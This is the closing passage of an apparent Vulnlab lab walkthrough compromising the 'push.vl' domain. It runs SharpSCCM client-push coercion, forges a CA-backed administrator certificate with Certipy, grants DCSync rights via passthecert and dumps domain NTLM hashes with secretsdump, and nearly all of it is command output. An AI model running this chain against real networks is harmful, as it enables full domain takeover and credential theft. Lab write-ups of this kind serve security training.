PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974

.

As we now have the password of user sccadmin, we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

Golden Certificate attack with certipy-ad and passthecert is possible because we have SYSTEM access to ms01 (which is the CA)

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂

.

references used

sccm

PassTheCert

sharpcollection

 

.